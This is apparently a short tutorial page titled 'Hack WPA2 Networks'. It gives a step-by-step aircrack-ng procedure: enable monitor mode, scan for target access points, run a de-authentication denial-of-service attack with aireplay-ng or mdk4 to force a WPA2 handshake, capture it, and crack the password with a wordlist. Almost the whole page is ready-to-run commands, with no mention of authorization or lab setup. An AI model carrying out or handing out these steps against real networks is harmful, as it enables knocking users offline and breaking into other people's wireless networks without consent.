Hack WPA2 Networks
Install Aircrak-ng In Your Machine
sudo apt install aircrack-ng
Put the Network Interface Card in Monitor Mode
Identify the Wireless Network Card
iwconfig
Run The Below Commands
sudo airmon-ng check rfkillsudo
airmon-ng start <network interface>
Look For Targets
sudo airodump-ng <network interface>
Scan A Specific Target
sudo airodump-ng <network interface> --bssid <AP>
Capture the Handshake
Performing DoS on the AP
You can use aireplay-ng
or mdk4
to disconnect devices from APs for a time. This is called a de-authentication attack or a wireless DOS (Denial-Of-Service) attack.
Now here’s the game plan:
Setup airodump-ng to capture packets and save them
De-authenticate the device for some time while airodump-ng is running
Capture the handshake
1. Setup airodump-ng to capture packets and save them
sudo airodump-ng -c <channel number> --bssid <AP BSSID> <network interface> -w <path for saved packets file>
2. Run the De-Authentication Attack
sudo aireplay-ng -a <BSSID of the AP> --deauth <time> <network interface>
3. Capture the Handshake
Cracking the Captured Password
sudo aircrack-ng <captured file with .cap> -w <path to wordlist>
END: Put Your Network Card In Managed Mode
To clean up, simply remove the file captures, close your terminals, and run the command service NetworkManager restart
to change your network card back to managed mode so you can connect to the Wi-Fi.
Last updated
Was this helpful?